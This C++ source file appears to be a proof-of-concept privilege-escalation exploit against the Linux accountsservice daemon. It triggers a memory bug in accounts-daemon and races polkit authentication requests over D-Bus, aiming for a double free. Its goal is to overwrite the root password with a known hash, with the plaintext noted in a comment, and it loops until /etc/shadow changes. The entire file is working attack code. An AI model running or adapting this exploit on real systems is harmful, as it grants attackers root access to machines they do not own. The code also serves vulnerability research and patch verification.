#include "dbus_utils.hpp" #include "dbus_auth.hpp" #include "parse.hpp" #include "utils.hpp" #include <pwd.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/stat.h> #include <sys/un.h> #include <sys/wait.h> #include <dirent.h> #include <errno.h> #include <spawn.h> #include <signal.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <pty.h> #include <fcntl.h> #include <functional> #include <memory> #include <utility> #include <iostream> #include <set> #include <random> #include <assert.h> static const char accounts_daemon[] = "/usr/lib/accountsservice/accounts-daemon"; static const char* etc_shadow_path = "/etc/shadow"; // Return true if the timespecs are equal. static bool timespec_eq(const timespec& t1, const timespec& t2) { return t1.tv_sec == t2.tv_sec && t1.tv_nsec == t2.tv_nsec; } // This class creates an array containing the names of all the files in a // directory. It does this by running `scandirat` in its constructor. class ScanDirAt { struct dirent **namelist_; const int n_; public: explicit ScanDirAt(int fd) : n_(scandirat(fd, ".", &namelist_, NULL, alphasort)) { if (n_ < 0) { throw ErrorWithErrno("ScanDirAt failed."); } } ~ScanDirAt(); int size() const { return n_; } const char* get(int i) const { return namelist_[i]->d_name; } }; ScanDirAt::~ScanDirAt() { if (n_ >= 0) { for (int i = 0; i < n_; i++) { free(namelist_[i]); } free(namelist_); } } // Search `/proc/*/cmdline` to find the PID of a running program. static std::vector<pid_t> search_pids(const char *cmdline, size_t cmdline_len) { AutoCloseFD procdir_fd(open("/proc", O_PATH | O_CLOEXEC)); if (procdir_fd.get() < 0) { throw ErrorWithErrno("Could not open /proc."); } ScanDirAt scanDir(procdir_fd.get()); const int n = scanDir.size(); std::vector<pid_t> result; for (int i = 0; i < n; i++) { const char* subdir_name = scanDir.get(i); AutoCloseFD subdir_fd( openat(procdir_fd.get(), subdir_name, O_PATH | O_CLOEXEC) ); if (procdir_fd.get() < 0) { continue; } AutoCloseFD cmdline_fd( openat(subdir_fd.get(), "cmdline", O_RDONLY | O_CLOEXEC) ); if (cmdline_fd.get() < 0) { continue; } // Check if the command line matches. char buf[0x1000]; ssize_t r = read(cmdline_fd.get(), buf, sizeof(buf)); if (r < 0 || static_cast<size_t>(r) < cmdline_len) { continue; } if (memcmp(buf, cmdline, cmdline_len) == 0) { // The name of the sub-directory is the PID. result.push_back(atoi(subdir_name)); } } return result; } static pid_t search_pid(const char *cmdline, size_t cmdline_len) { std::vector<pid_t> pids = search_pids(cmdline, cmdline_len); if (pids.size() == 1) { return pids[0]; } return -1; } class DBusSocket : public AutoCloseFD { public: DBusSocket(const uid_t uid, const char* filename) : AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0)) { if (get() < 0) { throw ErrorWithErrno("Could not create socket"); } sockaddr_un address; memset(&address, 0, sizeof(address)); address.sun_family = AF_UNIX; strcpy(address.sun_path, filename); if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) { throw ErrorWithErrno("Could not connect socket"); } dbus_sendauth(uid, get()); dbus_send_hello(get()); std::unique_ptr<DBusMessage> hello_reply1 = receive_dbus_message(get()); std::string name = hello_reply1->getBody().getElement(0)->toString().getValue(); std::unique_ptr<DBusMessage> hello_reply2 = receive_dbus_message(get()); } }; static std::string getHomeDir(uid_t uid) { FILE *fp = fopen("/etc/passwd", "r"); char buf[4096] = {}; struct passwd pw; struct passwd *pwp; while (true) { if (fgetpwent_r(fp, &pw, buf, sizeof(buf), &pwp) != 0) { fclose(fp); char errmsg[256]; snprintf( errmsg, sizeof(errmsg), "Could not find UID %u in /etc/passwd.", uid ); throw Error(errmsg); } if (uid == pw.pw_uid) { fclose(fp); return _s(pw.pw_dir); } } } static std::string send_accountsservice_FindUserById( const int fd, const uint32_t serialNumber, const uid_t uid ) { printf("send_accountsservice_FindUserById: (serial %u) uid = %u\n", serialNumber, uid); dbus_method_call( fd, serialNumber, DBusMessageBody::mk( _vec<std::unique_ptr<DBusObject>>( DBusObjectInt64::mk(uid) ) ), _s("/org/freedesktop/Accounts"), _s("org.freedesktop.Accounts"), _s("org.freedesktop.Accounts"), _s("FindUserById") ); std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd); if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) { throw Error("FindUserById returned an error."); } return reply->getBody().getElement(0)->toPath().getValue(); } static void send_accountsservice_SetPassword( const int fd, const char* userpath, const char* password, const char* hint, const uint32_t serialNumber ) { dbus_method_call( fd, serialNumber, DBusMessageBody::mk( _vec<std::unique_ptr<DBusObject>>( DBusObjectString::mk(_s(password)), DBusObjectString::mk(_s(hint)) ) ), _s(userpath), _s("org.freedesktop.Accounts.User"), _s("org.freedesktop.Accounts"), _s("SetPassword") ); // Don't wait for reply here because it's blocked on polkit. } static void send_accountsservice_set_property( const int fd, const uint32_t serialNumber, const char* userpath, const char* command, const char* value ) { dbus_method_call( fd, serialNumber, DBusMessageBody::mk( _vec<std::unique_ptr<DBusObject>>( DBusObjectString::mk(_s(value)) ) ), _s(userpath), _s("org.freedesktop.Accounts.User"), _s("org.freedesktop.Accounts"), _s(command) ); std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd); if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) { throw Error("set_property returned an error."); } } // Information that can be gathered once when we first start executing. class ProgramInfo { public: // Path to the dbus socket. (Usually: /var/run/dbus/system_bus_socket) const char* dbus_socket_path_; // UID and PID of this process. const uid_t uid_; const pid_t pid_; // Start time of the process. (Needed to register as an authentication agent.) const uint64_t start_time_; const std::string homedir_; explicit ProgramInfo(const char* dbus_socket_path) : dbus_socket_path_(dbus_socket_path), uid_(getuid()), pid_(getpid()), start_time_(process_start_time(pid_)), homedir_(getHomeDir(uid_)) { printf("uid: %u\n", uid_); printf("pid: %u\n", pid_); printf("home dir: %s\n", homedir_.c_str()); } }; static void send_polkit_RegisterAuthenticationAgent( const ProgramInfo& info, const int fd, const uint32_t serialNumber ) { std::unique_ptr<DBusMessageBody> body = DBusMessageBody::mk( _vec<std::unique_ptr<DBusObject>>( // Subject DBusObjectStruct::mk( _vec<std::unique_ptr<DBusObject>>( DBusObjectString::mk(_s("unix-process")), // subject_kind DBusObjectArray::mk1( _vec<std::unique_ptr<DBusObject>>( DBusObjectDictEntry::mk( DBusObjectString::mk(_s("pid")), DBusObjectVariant::mk( DBusObjectUint32::mk(info.pid_) ) ), DBusObjectDictEntry::mk( DBusObjectString::mk(_s("uid")), DBusObjectVariant::mk( DBusObjectInt32::mk(info.uid_) ) ), DBusObjectDictEntry::mk( DBusObjectString::mk(_s("start-time")), DBusObjectVariant::mk( DBusObjectUint64::mk(info.start_time_) ) ) ) ) ) ), DBusObjectString::mk(_s("en")), // locale DBusObjectString::mk(_s("/org/freedesktop/PolicyKit1/AuthenticationAgent")) // object path ) ); dbus_method_call( fd, serialNumber, std::move(body), _s("/org/freedesktop/PolicyKit1/Authority"), _s("org.freedesktop.PolicyKit1.Authority"), _s("org.freedesktop.PolicyKit1"), _s("RegisterAuthenticationAgent") ); std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd); if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) { throw Error("RegisterAuthenticationAgent returned an error."); } } // Sends an error reply back to the "BeginAuthentication" message that we // received from polkit. This cancels the authentication so that polkit // will deny the request. (Sometimes we want to deliberately delay the // cancellation for a bit, so this allows us to control that.) static void polkit_cancel_auth( const int fd, const uint32_t serialNumber, const DBusMessage& request ) { const std::string& sender = request.getHeader_lookupField(MSGHDR_SENDER).getValue()->toString().getValue(); // Send error request dbus_method_error_reply( fd, serialNumber, request.getHeader_serialNumber(), _s(sender), _s("org.freedesktop.PolicyKit1.Error.Cancelled") ); } class Run { const ProgramInfo& info_; const std::string pam_env_path_; // We're going to exchange messages with polkit and accounts-daemon. // This is lazy coding, but the logic is simplier if we use two // separate sockets. const DBusSocket polkit_fd_; const DBusSocket accounts_fd_; uint32_t serialNumber_; // Usually something like /org/freedesktop/Accounts/User1001 const std::string my_objectpath_; public: explicit Run(const ProgramInfo& info) : info_(info), pam_env_path_(info_.homedir_ + _s("/.pam_environment")), polkit_fd_(info_.uid_, info_.dbus_socket_path_), accounts_fd_(info_.uid_, info_.dbus_socket_path_), serialNumber_(1000), my_objectpath_( send_accountsservice_FindUserById(accounts_fd_.get(), serialNumber_++, info_.uid_) ) {} // This function triggers the bug by removing `~/.pam_environment` and // calling the "SetLanguage" method. void trigger_bug() { unlink(pam_env_path_.c_str()); try { send_accountsservice_set_property( accounts_fd_.get(), serialNumber_++, my_objectpath_.c_str(), "SetLanguage", "kevwozere" ); } catch(Error&) { // An error is quite likely, so ignore it. } } // We use this function to make sure that we're starting from a clean slate. // It makes the exploit a bit less unreliable. void restart_accounts_daemon() { while (true) { const pid_t pid = search_pid(accounts_daemon, sizeof(accounts_daemon)); if (pid < 0) { printf("accounts-daemon is not running\n"); break; } printf("accounts-daemon PID: %d\n", pid); trigger_bug(); // Sleep for 0.2 seconds, to give accounts-daemon a chance to crash. timespec duration = {}; duration.tv_sec = 0; duration.tv_nsec = 500000000; clock_nanosleep(CLOCK_MONOTONIC, 0, &duration, 0); } } void attempt_exploit( const size_t batch_size1, const size_t batch_size2 ) { restart_accounts_daemon(); send_polkit_RegisterAuthenticationAgent(info_, polkit_fd_.get(), serialNumber_++); // By default, accountsservice does not register the root user. This triggers it. const std::string root_objectpath = send_accountsservice_FindUserById(accounts_fd_.get(), serialNumber_++, 0); const pid_t pid = search_pid(accounts_daemon, sizeof(accounts_daemon)); printf("Starting exploit. PID: %u\n", pid); // Trigger the bug. trigger_bug(); // This is declared outside of the loop because we want to remember the // the last value that it's set to. char email[64] = "kevwozere@kevwozere.com"; // Try to occupy the chunk. for (size_t i = 0; i < batch_size1; i++) { // Changing the email address triggers a call to `save_extra_data`, // which causes a bunch of memory to be allocated and freed, but // without increasing the total memory usage. (At least, I haven't // noticed any memory leaks in that code.) So by jumbling the memory // up, it will hopefully increase the chance that one of the calls // to SetPassword will allocate the chunk that we want it to. snprintf(email, sizeof(email), "kevwozere@kevwozere.kevwozere.kevwozere.kevwozere.%.8lu.com", i ); send_accountsservice_set_property( accounts_fd_.get(), serialNumber_++, my_objectpath_.c_str(), "SetEmail", email ); // The password and hint are sized so that they will require a chunk // bigger than size 0x40. const char* password = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"; const char* hint = "0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"; send_accountsservice_SetPassword( accounts_fd_.get(), root_objectpath.c_str(), password, hint, serialNumber_++ ); } // We expect to receive one polkit "BeginAuthentication" for each // "SetPassword" message that we sent. std::vector<std::unique_ptr<DBusMessage>> polkit_requests_batch1; polkit_requests_batch1.reserve(batch_size1); for (size_t i = 0; i < batch_size1; i++) { polkit_requests_batch1.push_back(receive_dbus_message(polkit_fd_.get())); } // Trigger the bug a second time. If things are going to plan // then the chunk currently contains the memory that was allocated // by `user_set_password`. We can control when `free_passwords` // gets called on it by releasing `polkit_requests_batch1`. trigger_bug(); for (size_t i = 0; i < batch_size2; i++) { // Changing the email address triggers a call to `save_extra_data`, // which causes a bunch of memory to be allocated and freed, but // without increasing the total memory usage. (At least, I haven't // noticed any memory leaks in that code.) So by jumbling the memory // up, it will hopefully increase the chance that one of the calls // to SetPassword will allocate the chunk that we want it to. snprintf(email, sizeof(email), "kevwozere@kevwozere.kevwozere.kevwozere.kevwozere.%.8lu.com", i ); send_accountsservice_set_property( accounts_fd_.get(), serialNumber_++, my_objectpath_.c_str(), "SetEmail", email ); // The password and hint are sized so that they will require a chunk // of size 0x40. const char* password = "0123456789abcdef0123456789abcdef0123456789abcdef"; const char* hint = "0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"; send_accountsservice_SetPassword( accounts_fd_.get(), root_objectpath.c_str(), password, hint, serialNumber_++ ); } // Reject all of the authentication requests from the first batch. for (size_t i = 0; i < batch_size1; i++) { polkit_cancel_auth(polkit_fd_.get(), serialNumber_++, *polkit_requests_batch1[i]); // We should get an error response back from accounts-daemon. std::unique_ptr<DBusMessage> reply = receive_dbus_message(accounts_fd_.get()); if (reply->getHeader_messageType() != MSGTYPE_ERROR) { throw Error("Did not get the error response that we expected."); } // The error message should be org.freedesktop.Accounts.Error.PermissionDenied. // If it isn't then account-daemon probably crashed. const std::string& errmsg = reply->getHeader_lookupField(MSGHDR_ERROR_NAME).getValue()->toString().getValue(); if (errmsg != _s("org.freedesktop.Accounts.Error.PermissionDenied")) { throw Error(_s(errmsg)); } } // We expect to receive one polkit "BeginAuthentication" for each // "SetPassword" message that we sent in the second batch. std::vector<std::unique_ptr<DBusMessage>> polkit_requests_batch2; polkit_requests_batch2.reserve(batch_size2); for (size_t i = 0; i < batch_size2; i++) { if (search_pid(accounts_daemon, sizeof(accounts_daemon)) != pid) { throw Error("accounts-daemon crash"); } polkit_requests_batch2.push_back(receive_dbus_message(polkit_fd_.get())); } // Send a bunch of requests that will be approved by polkit (because // they only require org.freedesktop.accounts.change-own-user-data // permission). We're hoping that the auth data that is allocated for // one of these in `daemon_local_check_auth` (in an 0x40 chunk size) // will get freed before it is approved and overwritten with the auth // data for one of the subsequent SetPassword requests. // We alternate between the different messages because the timing // of when things will happen is very difficult to predict, so we // just have to rely on luck. for (size_t i = 0; i < batch_size2 + 64; i++) { // Reject all of the authentication requests from the second batch. // This will hopefully cause a double free of one of the 0x40 chunks. if (i < batch_size2) { polkit_cancel_auth(polkit_fd_.get(), serialNumber_++, *polkit_requests_batch2[i]); } // Note: this sends the same email address as we sent earlier (on the // final iteration of the batch1 loop). That's because we don't want // `user_change_email_authorized_cb` to call `save_extra_data`, which // would cause a bunch of memory churn that we don't want. dbus_method_call( accounts_fd_.get(), serialNumber_++, DBusMessageBody::mk( _vec<std::unique_ptr<DBusObject>>( DBusObjectString::mk(_s(email)) ) ), _s(my_objectpath_), _s("org.freedesktop.Accounts.User"), _s("org.freedesktop.Accounts"), _s("SetEmail") ); // password: iaminvincible! const char* password = "$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB"; const char* hint = "GoldenEye"; send_accountsservice_SetPassword( accounts_fd_.get(), root_objectpath.c_str(), password, hint, serialNumber_++ ); } // Give the messages a chance to get processed before we disconnect. sleep(2); printf("Finished iteration\n\n"); } }; int main(int argc, char* argv[]) { const char* progname = argc > 0 ? argv[0] : "a.out"; if (argc != 2) { fprintf( stderr, "usage: %s <unix socket>\n" "example: %s /var/run/dbus/system_bus_socket\n", progname, progname ); return EXIT_FAILURE; } const char* dbus_socket_path = argv[1]; try { // std::random is used to vary the batch sizes on each run, because // it's difficult to know which batch sizes are the most likely to // succeed. std::random_device rd; std::mt19937 gen(rd()); std::uniform_int_distribution<> distrib(1, 64); ProgramInfo info(dbus_socket_path); // When the poc is successful, the root user's password is set, // which causes /etc/shadow to be modified. So we can use stat // to detect when the exploit was successful. struct stat statorig; stat(etc_shadow_path, &statorig); while(true) { try { Run run(info); const size_t batch_size1 = distrib(gen); const size_t batch_size2 = distrib(gen); printf("batch sizes: %ld %ld\n", batch_size1, batch_size2); run.attempt_exploit(batch_size1, batch_size2); } catch (Error& e) { printf("%s\n", e.what()); sleep(2); } struct stat statnew; stat(etc_shadow_path, &statnew); if (!timespec_eq(statnew.st_mtim, statorig.st_mtim)) { printf("%s was modified!\n", etc_shadow_path); break; } } } catch (ErrorWithErrno& e) { const int err = e.getErrno(); fprintf(stderr, "%s\n%s\n", e.what(), strerror(err)); return EXIT_FAILURE; } catch (std::exception& e) { fprintf(stderr, "%s\n", e.what()); return EXIT_FAILURE; } return EXIT_SUCCESS; }